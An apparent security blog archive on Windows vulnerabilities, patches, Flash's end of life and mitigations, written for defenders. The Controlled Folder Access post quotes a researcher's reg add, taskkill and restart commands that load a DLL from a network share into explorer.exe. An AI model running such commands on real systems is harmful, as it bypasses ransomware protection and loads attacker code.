Windows 10 NTFS Corruption Vulnerability

====================

Update: 20th April 2021

====================

Microsoft have released a security update (part of the April 2021 security updates)  to address this vulnerability. Please install it to resolve this vulnerability. My thanks to BleepingComputer for the above linked to article.

Thank you.

====================

TL;DR:
Exercise standard caution when receiving unexpected email attachments or downloading attachments from websites. An unofficial fix is also available (please see below for the link). Mozilla Firefox 85.0.1 prevents exploitation from within that browser.

In mid-January 2021 a security researcher publicly disclosed a software bug within Windows 10 that could be used to cause a denial of service (DoS) upon an impacted system.

Why should this vulnerability be considered important?
This issue is very easy to trigger (via one line of code within a Windows shortcut file (.lnk), a ZIP archive or a batch file (*.bat)) and affects standard user and not just administrator accounts within Windows 10 Version 1803 and later. Separately Windows XP is also affected but will not be patched against this issue.

This The Verge article provides a summary “Attackers can hide a specially crafted line inside a ZIP file, folder, or even a simple Windows shortcut. All a Windows 10 user needs to do is extract the ZIP file or simply look at a folder that contains a malicious shortcut and it will automatically trigger hard drive corruption”.

More alarming is that for some systems which upon this command was executed were repairable via Microsoft’s Check Disk (Chkdsk) utility while at other times the same system is rendered unbootable.

How can I protect my organisation or myself from this vulnerability?
Please exercise standard caution when receiving unexpected email attachment or downloading attachments from websites since these sources could contain a Zip file. The Zip could contain a shortcut file designed to exploit this vulnerability. This will lower significantly the possibility of exploitation.

If you believe the risk of users within your organisation opening a Zip attachment is too high, please consider installing this unofficial filter driver which will mitigate the issue until an official fix from Microsoft is available.

Mozilla Firefox 85.0.1 prevents the exploitation of this issue from within Firefox but the other means of exploiting it from within Windows remain.

Thank you.

Special thanks to “The Verge” for the summary included above.

Adobe Flash Player Approaching Final Milestone

TL;DR:

With Adobe Flash Player nearing its end of life; if you use it for any locally saved content or games you may wish to consult the alternatives presented below or the Sophos blog post linked to below (that post provides suggestions from their community). If you don’t use Flash Player, you don’t need to take any action; Mozilla Firefox, Google Chrome and Microsoft are taking steps to disable and remove Flash.

=======================

=======================
Update: 12th January 2021
=======================
According to the following links; Flash Player will be phased out of use within major web browsers upon the following dates:

=======================
12th January: Microsoft will remove Flash Player from Internet Explorer and Microsoft Edge (Legacy) via the monthly cumulative security update. This does not appear to have taken place. However; it appears this will take place in the coming weeks.

21st January: Flash Player will be removed from Google Chrome and Microsoft Edge (Chromium) when version 88 of the browsers are released.

26th January: Mozilla will release Firefox 85 which will no longer support Adobe Flash.
=======================

For supported versions of Windows namely 10, 8.1 and their Server equivalents; the following uninstaller “update” from Microsoft would apply:

https://support.microsoft.com/en-us/help/4577586/update-for-removal-of-adobe-flash-player
For older systems; the uninstaller from Adobe would apply:

https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html

A definitive list of ways to remove Flash is provided in the following blog post:

https://www.askwoody.com/2021/tasks-for-the-weekend-january-9-2021/

My thanks to Susan Bradley of AskWoody.com for this really useful post.

Thank you.

=======================
What milestone is Adobe Flash Player approaching?
On the 1st of January 2021 will no longer support or provide security updates for Adobe Flash Player. Most web browsers will disable its use and Microsoft will release an uninstaller for it in the coming months. This will remove the once highly targeted piece of software from your systems. This will mean one less set of updates to regularly deploy.

What are my options if I still use Flash?
One solution I located online is to install and use the Flash Player debugger which will allow you to open Flash (.swf, technically named Shockwave Flash) files belonging to games stored on your computer (this option likely won’t be available from Adobe’s website after the 31st of December 2020).

This option isn’t without risk. The Flash Debugger will no longer be updated after 31st December. If you need to continue using it, try to isolate the system it is used on and make certain the system is at least protected with a firewall (a proxy server or web application firewall in the case of a corporate environment). Don’t open unknown or unexpected Flash (.swf) files.

Other suggestions for playing games are provided within this Sophos blog post (their community have posted some suggestions). VideoLAN VLC can play *.swf files. The free IrfanView has a Flash plugin but appears to require Adobe’s Flash Player too and seems not to be trivial to use.

If I don’t want to wait to uninstall Flash, what options do I have?
This article explains how to uninstall Flash on Linux specifically the Ubuntu, Linux Mint, or Debian distributions.

For Apple Max OS X 10.1 to 10.3; there is an uninstaller available with the appropriate steps to use it here.

For Apple OS X 10.4 and later; there is an uninstaller available with the appropriate steps to use it here.

I have listed the options for Windows last since it has the most complicated options. For Windows 7 and earlier; you can use the Adobe provided uninstaller from here.

For Windows 8.1 and later you can either wait until Microsoft issues a Flash Player uninstaller automatically in January 2021 (predicted) or for Windows 8.1 and Windows 10 you can manually install this Microsoft update which will uninstall the integrated version of Flash from Windows.

This manual uninstaller removes only the version of Flash built into Windows (used by Internet Explorer). Any other browsers will keep their versions of Flash. The standalone version of Flash PPAPI (used by Google Chrome and Microsoft Edge) and the older NPAPI versions of Flash will not be removed. You can use the Adobe provided uninstaller from here to remove those or uninstall them using the Apps and Features settings window (Windows 10) or Programs and Feature window of Control Panel (Windows 8.1).

Many thanks to Lawrence Abrams of Bleepingcomputer.com for testing this new update and providing the clarification of what the update (the uninstaller) does and does not do. The community of Bleepincomputer.com also contributed to the above linked to post.

How does this transition affect me, personally?
For me, the impact is minimal; perhaps none. I have some old training videos that were created in *.swf format that VideoLAN VLC can play. Apart from this, I have not used Flash Player in many years, but I always kept the built-in version of Windows up to date.

I do remember YouTube using Flash many years ago before the switch to HTML 5. Versions 10.1 and 11 of Flash brought smooth HD ready video viewing to YouTube which back in 2010 and 2011 was quite impressive. Previous to this an HD video would make a laptop or a low grade desktop system struggle. I welcome the removal of Flash since it will be one less plugin to maintain.

Its arguable if security is immediately increased with the removal of Flash since many browsers have blocked Flash for several years. Before this; the plugin was also made  “click to play” too (which increased security a lot, far better than just automatically running). Security exploits for Flash became more scarce as its end of life was announced and as HTML 5 became more mature. It is possible after the end of life of Flash Player in December 2020, more vulnerabilities may be reported and that is when  I believe this removal will begin to provide a benefit. However; from an attack surface reduction point of view; removing Flash Player will provide a security benefit. For most people, the removal of Flash Player will likely not be noticed.

I will keep the Flash Player tracker post updated until the end of 2020. After this, all of those posts will be redundant but will remain on this blog for your reference.

I hope the above suggestions are useful. Thank you.

Microsoft Adds Security Mitigations to Windows 10 Version 2004

TL; DR:
Windows 10 Version 2004 includes a further security mitigation which promises to all but eliminate a class of common vulnerabilities. If your system is compatible with Windows 10 Version 2004, you can begin to benefit right now from these changes. Software developers can also optionally use this new feature.

=======================
During the development of the most recent version of Windows 10; Version 2004 Microsoft has sought to block threat actors from exploiting a specific class of vulnerabilities that make up between 5 to 10% of all Microsoft security vulnerabilities observed in the recent past.

How did Microsoft seek to address this class of vulnerabilities?
A design to mitigate uninitialised kernel (defined) pool memory was chosen since Microsoft does not always wish to rely on static analysis (defined), fuzzing (defined), or a code review to detect and prevent the introduction of vulnerabilities into production software before a threat actor locates them. Ideally the code should contain no uninitialized kernel pool issues by design.

Will this extra step within the code decrease performance?
Setting the heap memory to a known value before use while more secure will be slower. Microsoft thus carried out tests to determine just how much of an impact this would have.

While initial tests showed a 15% decrease in performance with the issues identified within the code now fixed due to those tests; the tests were re-run. The performance impact to a test web server which is very sensitive to small changes in its operations was approximately 1% with experimental error.

The results of the test carried out by Microsoft can be summarised as follows:

1. Smaller allocations of memory were more common, but the performance impact of the new mitigations was not unreasonable.
2. Since performance of this security mitigation was already acceptable, very little was done to optimise the implementation apart from the following:
   1. If large memory allocations are requested, the Windows memory manager will attempt to use memory that has already been zeroed. Thus, large amounts of memory can be quickly allocated.
   2. It was found that some newly allocated memory was being zeroed out twice; further checks will seek to make certain that in general newly allocated memory is only zeroed out once.

How can software developers take advantage or opt-out of this new security mitigation?
Microsoft created a new API for hardware drivers (defined) that allows a developer to have memory they request zeroed before use. This was chosen since non-Microsoft software compilers can also take advantage of this new change. Further details of the new APIs names are provided in Microsoft’s blog post

An ability for software developers to opt-out of the zeroing of requested memory if the performance of their software is significantly impacted has been provided.

When will this security mitigation be available in Windows 10?
The deployment of this new memory management technique has already taken place within Windows 10 Version 2004 and will be featuring in Hyper-V and the networking components of Windows in the near future. The code written by developers can be shorter since they no longer need to zero initialise memory themselves. Microsoft has plans to bring these changes to 3rd party drivers too but this is still an early work in progress.

Thank you.

April 2020 Update Summary

=======================
Update: 27th April 2020
=======================
Late last week, Microsoft issued a security advisory for Microsoft Office 2019, 365 ProPlus and Paint 3D (available within Windows 10).

These correct 4 remote code execution (an attacker can carry out any action of their choice on a compromised system) and 2 denial of service (in this instance the affected application will become unresponsive) vulnerabilities. These vulnerabilities also affect the following Autodesk products:

FBX-SDK
Maya
Motion Builder
Mudbox
3ds Max
Fusion
Revit
Flame
Infraworks
Navisworks
Autodesk AutoCAD

Please make certain your versions of the affected Autodesk products, Office 2019 or 365 ProPlus and Paint3D are up to date. The steps detailed in this linked to BleepingComputer article will guide you through doing so. The Paint3D app should have already installed the update automatically. However you can manually check for updates with these steps.

The necessary details to update the affected Autodesk products are available in the above linked to Autodesk security advisory. Details for verifying if Paint3D and Microsoft Office have been updated are provided in Microsoft’s advisory. Please see the questions titled: “I am running Office 2019 or Office 365 ProPlus. How do I tell if the security update for this vulnerability is included in my version of Office?” and “I have Paint 3D or 3D Viewer installed. How do I know if I have the security update installed?” Further details of the potential impact of these vulnerabilities as well as a recommended mitigation step are provided in this Sophos blog post.

Thank you.

=======================
Update: 15th April 2020
=======================
Yesterday Microsoft  released their scheduled updates to resolve 113 CVEs (defined). Similarly Adobe released 3 security bulletins.

Microsoft’s monthly summary; lists Known Issues for 43 Microsoft products but all have workarounds or resolution steps listed.

To begin with, let’s look at Adobe’s updates:
Adobe After Effects: 1x Priority 3 CVE resolved (1x Important severity)
Adobe ColdFusion: 3x Priority 2 CVEs resolved (3x Important severity)
Adobe Digital Editions: 1x Priority 3 CVE resolved (1x Important severity)

Adobe later issued further updates:
Adobe Bridge: 17x Priority 3 CVEs resolved (14x Critical severity, 3x Important severity)
Adobe Illustrator: 5x Priority 3 CVEs resolved (5x Critical severity)

If you use the above Adobe products, please install these updates (especially in the case of the above critical vulnerabilities within Bridge and Illustrator).

====================
A further useful source of update related information is the US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

====================
As always for this month’s Microsoft updates, I will prioritize the order of installation below:
====================
Following disclosure last month, the Adobe Type Manager (ATM) vulnerabilities have been patched in addition to the following zero day vulnerabilities and a further publicly disclosed vulnerability;

Zero Days (defined):
Microsoft Adobe Type Manager: CVE-2020-0938 and CVE-2020-1020
Microsoft Scripting Engine: CVE-2020-0968
Windows Kernel: CVE-2020-1027

Publicly disclosed:
Microsoft OneDrive: CVE-2020-0935

====================
Microsoft Scripting Engine: CVE-2020-0970
Microsoft Chakra Scripting Engine: CVE-2020-0969
Microsoft Graphics: CVE-2020-0687
Microsoft Graphics Components: CVE-2020-0907
Windows DNS: CVE-2020-0993
Windows Hyper-V: CVE-2020-0910
Windows Codecs: CVE-2020-0965
Windows Media Foundation: CVE-2020-0948 , CVE-2020-0949 , CVE-2020-0950
Microsoft SharePoint: CVE-2020-0929 , CVE-2020-0931 , CVE-2020-0932, CVE-2020-0974
Microsoft Office SharePoint XSS: CVE-2020-0927
Microsoft Dynamics: CVE-2020-1022

====================

Please install the remaining updates at your earliest convenience.

As per standard best practice, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues.

I have also provided further details of updates available for other commonly used applications and devices below.

To all of my readers and your families, please stay safe during these challenging times. Thank you.

====================
Mozilla Firefox
====================
On the 7th of April, Mozilla released Firefox 75 and Firefox ESR (Extended Support Release) 68.7 to resolve the following vulnerabilities:

Firefox 75.0: Addresses 3x high severity CVEs, 3x moderate severity CVEs

Firefox 68.7 ESR: Addresses 4x high severity CVEs (1 of which only affects Firefox for Android) and 1x moderate severity CVE

Firefox 75 and the previous 74.0.1 reverse the removal of support for TLs 1.0 and TLS 1.1. due to the current COVID-19 situation. It offers improved performance when installed on systems powered by Intel GPUs (defined), is available in the Flatpak distribution format for Linux and offers improved performance by “locally cache all trusted Web PKI Certificate Authority certificates that Mozilla knows, improving security and HTTPS compatibility with misconfigured web servers as a direct result”. Moreover, an improved address bar is now present in Firefox 75. Its improvements are detailed in Firefox’s release notes. Please also be aware of the new telemetry Mozilla has begun to collect with Firefox 75, you may or may not wish to turn this off.

Firefox 74.0.1 and Firefox ESR 68.6.1 were released on the 3rd of April to resolve the following zero day (defined) vulnerabilities actively being exploited in targeted attacks:

Firefox 74.0.1 and Firefox 68.6.1 ESR: Addresses 2x critical severity CVEs

Details of how to install updates for Firefox are here. If Firefox is your web browser of choice, if you have not already done so, please update it as soon as possible to benefit from the above changes.

====================
VMware
====================
VMware released 3 security advisories to resolve vulnerabilities within the following products:

VMware vCenter Server
VMware vRealize Log Insight
VMware ESXi 6.5 up to and including 7.0

====================
Advisory 1: Severity: Critical:
VMware vCenter Server

Advisory 2: Severity: Important
VMware vRealize Log Insight

Advisory 3: Severity: Important:
VMware ESXi 6.5 up to and including 7.0
====================

If you use either of the above products, please review the above advisories and install the applicable security updates as soon as possible.

=======================
Oracle:
=======================
Oracle issued updates to resolve 405 vulnerabilities this month. Further details and installation steps are available here. 15 vulnerabilities affect the Java runtime; all of which are remotely exploitable without an attacker needing to obtain a user’s username and password (their credentials).

Separately Oracle has issued a notice that attacks are being detected attempting to exploit a patched vulnerability (CVE-2020-2883) in Oracle Web Logic server. They strongly suggest installing this month’s update for that product to protect against these attacks.

If you use any of the Oracle products listed here, please install the appropriate security updates as soon as possible.

====================
OpenSSL
====================
On the 21st April the OpenSSL Foundation issued OpenSSL 1.1.1g which includes a high severity security fix.

FTP mirrors to obtain the necessary downloads are available from here. Downloadable Tarballs (compressed/packaged code made for distribution) are available from here.

It should also be possible to use the package manager of a Linux/Unix operating system to update your OpenSSL installation as mentioned within the section titled “Installing updates for Linux distributions” on the “Protecting Your PC” page of this blog.

=======================
WinSCP:
=======================
In early April WinSCP version 5.17.3 was made available upgrading its version of OpenSSL to 1.1.1f (from the previous version of 1.1.1d). This update resolves 1x Low severity vulnerability.

On the 24th of April, WinSCP was upgraded to version 5.17.4 which also upgrades its version of OpenSSL to version 1.1.1g resolving a high severity vulnerability. Please install this update if you use WinSCP.

====================
VideoLAN VLC
====================
On the 28th of April, VideoLAN released version 3.0.10 resolving multiple security issues (version 3.2.12 for Android and version 3.2.7 for iOS were also released) assigned to 7 CVEs (various DOSes (Denial of Services) in the microDNS service discovery). 1 CVE has been rated as critical with the other 6 being of high severity. The most recent versions can be downloaded from:

http://www.videolan.org/vlc/

====================
Wireshark
====================
In early April, Wireshark made available the following updates (I’ll detail only the 2 most recent versions here):

v3.2.3: Relating to 1 security advisory (relating to 1 CVE)
v3.0.10: Relating to 1 security advisory (relating to 1 CVE)

As per standard process Linux distributions can obtain this update using the operating systems standard package manager (if the latest version is not installed automatically using the package manager you can instead compile the source code (v3.2.4 or v3.0.9). This forum thread and this forum thread may also be helpful to you with installing Wireshark on your Linux based system.

For Mac OS X and Windows, the update is available within the downloads section of the Wireshark website. In addition, a detailed FAQ for Wireshark is available here.

Thank you and please stay safe.

Magellan 2.0 SQLite Vulnerabilities: What you need to know

====================
[TL DR]
====================
If you use any of the affected products e.g. Google Chrome, Mozilla Firefox or Android WebView (full list provided below), please make certain to update them to the latest version available.

In the closing days of December, security researchers from the Tencent Blade team disclosed five vulnerabilities that affect the SQLite database. This is used in products such as Google Chrome, Android WebView, Mozilla Firefox and Windows 10 (among others):

https://blade.tencent.com/magellan2/index_en.html

Why should these vulnerabilities be considered important?
Due to the widespread use of the affects products and the severity of the vulnerabilities the potential for a large impact is present. These vulnerabilities if exploited could allow “remote code execution in Chromium render process.

However, the CVSS base scores (defined) for all but one vulnerability (at 8.8: High) are 6.5 Medium severity. Thus, these vulnerabilities are NOT critical but medium to high severity. The rationale for this is explained by the creator of SQLite, D. Richard Hipp. While the comment is from 2018 it is still valid since most applications which use SQLite are not impacted by remote attacks:

“Reports of an RCE vulnerability in SQLite are greatly exaggerated. Some clever gray-hats found a way to get RCE using maliciously crafted SQL. So, IF you allow random internet users to run arbitrary SQL on your system, you should upgrade. Otherwise, you are not at risk” (Source).

While Chromium based browsers effectively do allow “random internet users to run arbitrary SQL”; Google have already issued an update (see below). Other browsers will follow e.g. Opera did so on the 27th of December upgrading to the same version of Chromium that Google issued namely, 79.0.3945.79

How can I protect my organisation or myself from these vulnerabilities?
If you use any of the following products, please make certain to update to the most recent versions available. Google made available Chrome version 79.0.3945.79 on the 10th of December to resolve these vulnerabilities with Opera following on the 27th of December:

Affected Products (among others):
Chrome/Chromium prior to version 79.0.3945.79
Smart devices using old version of Chrome/Chromium.
Browsers built with old version of Chromium/Webview.
Android Apps that uses old version of Webview and can access any web page.
Software that uses the old version of Chromium and can access any web page.

Thank you.

Researching the recent Windows CTF Vulnerabilities

================
TL DR
================
There are no known mitigations for these vulnerabilities. Please see below for a more in-depth explanation.
================

With the release of a security updates by Microsoft in September and August to resolve vulnerabilities in the Windows ALPC and Windows Text Service Framework I wish to provide details on these vulnerabilities.

Why should these vulnerabilities be considered important?
If an attacker were to have ALREADY compromised a vulnerable Windows system, they can then use the exploits made available by Google’s Tavis Ormandy to fully compromise your system. They can obtain the highest level of privilege on it namely NT Authority\System (equivalent to root on a Linux system).

Ormandy found that the running ctfmon.exe of Windows allowed a standard user of Windows to hijack any Windows process even if that process was sandboxed within an AppContainer (a means of isolating sensitive/important processes making them harder to attack). When an attacker does so they can obtain administrative and under some circumstances NT Authority\System level access.

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1162

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1235

How I can protect my organization and myself from these vulnerabilities?
Apart from installing the above linked to updates, I’m afraid no other mitigations are available. You will need to exercise standard vigilance/caution with opening links. Don’t open attachments you weren’t expecting even from trusted contacts.

This advice is an unfortunate outcome. I had a hypothesis that disabling the ctfmon.exe process (Windows XP, Windows Vista and Windows 7) or the Touch Keyboard and Handwriting Panel service in Windows 8.1 and 10 would mitigate this class of vulnerabilities. This was not the case, Ormandy’s tool worked regardless of whether the ctfmon.exe process was running or not, which now makes sense given how his tool exploits a deeply integrated feature of Windows with a scope much larger than that of the above mentioned process and service.

================
Proof of Concept
================
As a proof of concept on an un-patched version of Windows 10 Version 1903, I can confirm Tavis Ormandy’s CTFTool successfully provides you with both System and Administrative (depending on the type of exploit you run). Only administrative access is available for Windows 7, the tool does not incorporate the System level exploit for Windows 7. Further details of this tool are available at the following links:

https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html

https://github.com/taviso/ctftool

Thank you.

Retpoline To Improve Windows 10 Performance Following Spectre Vulnerability

Alex Ionescu, a Windows Internals expert and Security Architect with CrowdStrike in mid-October provided new insight into performance improvements coming to the next update of Windows, namely 19H1 or Version 1903:

With performance decreases estimated to be up to 30% in the worst-case scenarios while mitigating the Spectre vulnerabilities earlier this year; the upcoming version of Windows will add Google’s Retpoline instructions to improve performance:

Such instructions are already present in Red Hat, SUSE and Oracle Linux 6 and 7. Ionescu revealed that performance was significantly improved while trusting the newer version of Windows 10. Moreover; Spectre variant 2 (CVE-2017-5715) will now be fully mitigated even if your hardware was not updated to support indirect branch restricted speculation (IBRS); making it more secure. In his words “On systems without IBRS, Windows won’t flush the BPB on kernel->user transitions. This opens up a potential security issue for CPUs without microcode that implements IBRS”.

He also confirmed that Retpoline is enabled on systems with indirect branch prediction barrier (IBPB). This will protect such systems from kernel to user transitions where currently no protection exists. Finally he asked that Retpoline be back ported earlier (but currently supported) versions of Windows since systems without IBRS are “sitting ducks”:

These changes were also announced by a Microsoft engineer, Mehmet Iyigun working within the Windows and Azure kernel team.

In April 2019 we can look forward to a more secure and faster version of Windows. I’m particularly pleased to learn this since my water cooled Intel processor; an 18 core (36 thread) Core i9 7980XE has received full protection from Spectre in the form of IBRS and IBPB from the motherboard vendor. Performance impact has been minimal but any increase in performance is welcomed for my donations to Stanford’s Folding@Home project.

More info on IBRS and IBPB is available from this link. Thank you.

Security Researcher Demonstrates Bypass for Controlled Folder Access

In Windows 10 version 1709 (also known as the Fall Creator’s Update or Redstone 3) and later versions Microsoft introduced a feature known as Controlled Folder Access which aims to prevent ransomware (or unknown applications) from encrypting files within folders that you specify. Further details are provided here.

Last week at the DerbyCon security conference a security researcher, Soya Aoyama from Fujitsu System Integration Laboratories demonstrated how DLL injection (The technique of DLL injection is explained in more detail here and here.) could be used to add a DLL (defined) to the user interface (UI) of Windows 10 (in the form of the shell process, explorer.exe).

The Controlled Folder Access works by preventing any applications not present on a whitelist (a list of allowed applications) from modifying the files in the folders listed as requiring protected. Using the fact that explorer.exe is present on that allowed list; enabled the researcher to bypass this ransomware protection by adding the DLL as a context menu handler. This list of context handlers would usually allow you to for example; perform an anti-malware scan on a file by right clicking or to compress a file using 7-Zip. This list is stored in the Windows Registry at the following location:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

In order to interact with a user explorer.exe by default it loads the shell.dll from the following location:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32

Aoyama changed the DLL value from shell.dll to his DLL in order that explorer.exe would load it when it started. He then terminated and restarted explorer.exe to successfully load his DLL.

Microsoft currently not in favour of patching this vulnerability
As per Microsoft’s 10 immutable laws of security; at this time they don’t intend to patch this vulnerability since it relies on an attacker having already compromising your system and using it to run a legitimate command to load a malicious DLL into explorer.exe:

reg add HKCU\Software\Classes\CLSlD\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\lnprocServer32 /f /ve /t REG SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll

taskkill /1M explorer.exe /F

start explorer.exe

Due to this pre-requisite of compromising the system first; this issue won’t be patched. This bypass however does not require administrative (defined) access. Aoyama also demonstrated that Windows Defender did not detect this bypass; neither did other anti-malware solutions such as: Avast, ESET, Malwarebytes Premium or McAfee.

How can I protect myself from this bypass?
There are limited options available at this time to prevent this bypass from occurring. If an attacker can download the necessary DLL to your systems and load it; there is a possibility that your anti-malware solution may detect it since the DLL will likely have a low reputation (it would not be a commonly used file); but this is not guaranteed. This especially true since other anti-malware vendors did not detect it.

HitmanPro.Alert may detect this DLL on your system before it has been added to explorer.exe but would require you to have the premium version installed and monitoring your systems to do so.

The key to prevent the above from occurring would be to follow standard email and instant messaging best practices and lock your system (requiring a password or other form of authentication when you return to the system) when you are away from it to prevent someone entering commands. Keeping your system up to date will also reduce the risk of such a DLL from being downloaded if you were to click on a link in an email or instant message or via a drive by download.

If an attacker can physically access and type commands on your system; application white listing in the form of Windows AppLocker would not by default prevent (but even that feature can be bypassed) this attack since the command run by Aoyama makes use of legitimate Windows tools. If an attacker was to try to execute a script for the command (which is far more likely); AppLocker would block it if it is configured to block unknown scripts.

The DLL blocking feature of Windows AppLocker would also assist in this context but may introduce a performance penalty due to the level of effort it needs to undertake to carry out these checks.

Monitoring the location within the Window registry for changes using a tool such Autoruns is also a possibility but you would need to do this manually and given that ransomware doesn’t usually wait to encrypt your files is likely to be ineffective/too slow to detect this bypass.

Given the attention this bypass has received; anti-malware software may detect changes to the explorer.exe context handlers or the shell location going forward but again this is not guaranteed.

I am investigating another option and will update this post when I have more information available.

Thank you.

 

 

Protecting Against the Windows 10 Task Scheduler Zero Day Vulnerability

====================
Update: 5th September 2018:
====================
As previously advised; exercising caution when receiving emails with attachments will keep you safe from the following malware now exploiting this vulnerability.

Your anti-malware software will likely also protect you from this exploit since the majority of vendors are detecting (verified using VirusTotal) the file hashes listed in the security firm Eset’s blog post:

Eset have detected attackers delivering an exploit for this vulnerability via email. The exploit targets victims in the following countries:

• Chile
• Germany
• India
• Philippines
• Poland
• Russia
• Ukraine
• United Kingdom
• United States

The attackers have made small changes of their own to the published proof of concept code. They have chosen to replace the Google Updater (GoogleUpdate.exe)(which runs with admin privileges (high level of integrity)) usually located at:

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

They replace the updater with a backdoor application of their own that is run with the highest privilege namely System level integrity. This is a stage one of their attack. If the attackers find anything of interest on the infected system a second stage is downloaded allowing them to carry out any commands they choose, upload and download files, shutting down an application or parts of Windows of their choice and listing the contents of the data stored on the system.

The attackers also use the following tools to move from system to system across (laterally) a network: PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

Thank you.

====================
Original Post:
====================
With the disclosure early last week of zero day vulnerability (defined) I wanted to provide some advice on staying safe while a patch from Microsoft is being developed.

What systems are affected and how can an attacker use this vulnerability to compromise systems?
Once this pre-developed working exploit is delivered to a 64 bit Windows 10 system it can be used to provide an attacker with the highest level of privilege (System level access) on that system allowing them to carry out any action they choose. They can achieve this by changing permissions on any file stored on a system thus giving them the ability to replace/change any file. When a system service executes what it believes to be a legitimate file but is instead the attacker substituted file; the attacker obtains the privileged access of that service.

The effectiveness of this exploit has been verified by Will Dorman from the CERT/CC. 32 bit versions of Windows are also affected. For Windows 8.1 and Windows 7 systems; the exploit would require minor changes before it can result in the same level of effectiveness (but may be inconsistent on Windows 7 due to the hardcoded XPS printer driver (defined) name within the exploit).

An attacker must already have local access to the systems they wish to compromise but could obtain this using an email containing an attachment or another means of having a user click on a link to open a file. The base CVSS score of this vulnerability is 6.8 making it make of medium severity for the above reasons.

How can I protect myself from this vulnerability?
Standard best practice/caution regarding the opening of email attachments or clicking links within suspicious or unexpected email messages or links from unknown sources will keep you safe from the initial compromise this exploit code requires to work correctly.

The advisory from the CERT/CC has also been updated to add additional mitigations. BEFORE deploying these mitigations please test them thoroughly since they can “reportedly break things created by the legacy task scheduler interface. This can include things like SCCM and the associated SCEP updates”.

A further option you may wish to consider is the deployment of the following micropatch from 0Patch. This patch will automatically cease functioning when the relevant update from Microsoft is made available. As with the above mitigations; if you wish to deploy this micropatch please test how well it works in your environment thoroughly BEFORE deployment.

Further advice on detecting and mitigating this exploit is available from Kevin Beaumont’s post.

Thank you.

Blog Post Shout Out: June 2018

A number of varied security issues have come to my attention this week which I wanted to keep you informed of. I will provide a respectable shout out to the following sources:

Apple Encrypted Drive Information Disclosure:
At this time Apple macOS has an information disclosure vulnerability that affects encrypted drives in general (encrypted Apple HFS+ / APFS+ and VeraCrypt) that provide the potential for an attacker to obtain details of the files an encrypted hard drive is storing.

This vulnerability originates from the quick look feature of macOS; which allows a user to preview photos, files and folders quickly without having to open them. This feature stores the thumbnails (defined) of the files centrally in a non-encrypted area of the hard disk. This issue can also occur when a USB memory drive is inserted; the same feature stores thumbnails on the external drive and on the boot drive of the macOS system.

If you use an encrypted hard disk or value your privacy when using external drives, please run the following command documented at the end of the following news article after you have viewed sensitive info and want to clear that history/activity:

macOS Breaks Your OpSec by Caching Data From Encrypted Hard Drives: BleepingComputer by Catalin Cimpanu

This suggestion is a workaround until (and if) Apple patches this.

=================
Yubico WebUSB Bypass:
The two-factor authentication/secure login vendor, Yubico has published a security advisory for the use of their YubiKeys. The vulnerability does not reside within the hardware keys themselves but in the authentication steps a web browser (e.g. Google Chrome) uses to authenticate an individual.

In summary, if you are using Google Chrome, please ensure it is updated to version 67 or later and follow the additional suggestion from Yubico in their security advisory:

Security Advisory 2018-03-02 – WebUSB Bypass of U2F Phishing Protection: Yubico

Windows 10 Persistent Malware:
The security vendor BitDefender have published a 104 page report detailing a spyware (defined) which uses rootkit functionality (defined). This malware is noteworthy due to its longevity (dating back to 2012) and it’s ability to install even on modern versions of Windows e.g. Windows 10:

Six Years and Counting: Inside the Complex Zacinlo Ad Fraud Operation: BitDefenders Labs

=================
On a side note I am not too surprised this infection can persist on Windows 10. If a user is tricked into running malware e.g. by clicking a link or opening an attachment either of which can be contained in  a phishing (defined) email or an even more convincing spear phishing (defined) email from an organization or colleague you trust; strong defences won’t always keep you from becoming infected.

The BitDefender report can be downloaded from the above link (it does not request any personal information).

=================
The following news article links to 2 detailed but still easy to follow removal guides. If you are experiencing un-wanted adverts showing within websites that don’t usually show them (even though you are using an ad blocker) or are experiencing re-directs namely you wish to visit website A but are actually sent to website B, please follow these guides to remove this malware:

Rootkit-Based Adware Wreaks Havoc Among Windows 10 Users in the US: BleepingComputer: by Catalin Cimpanu
=================

Thank you.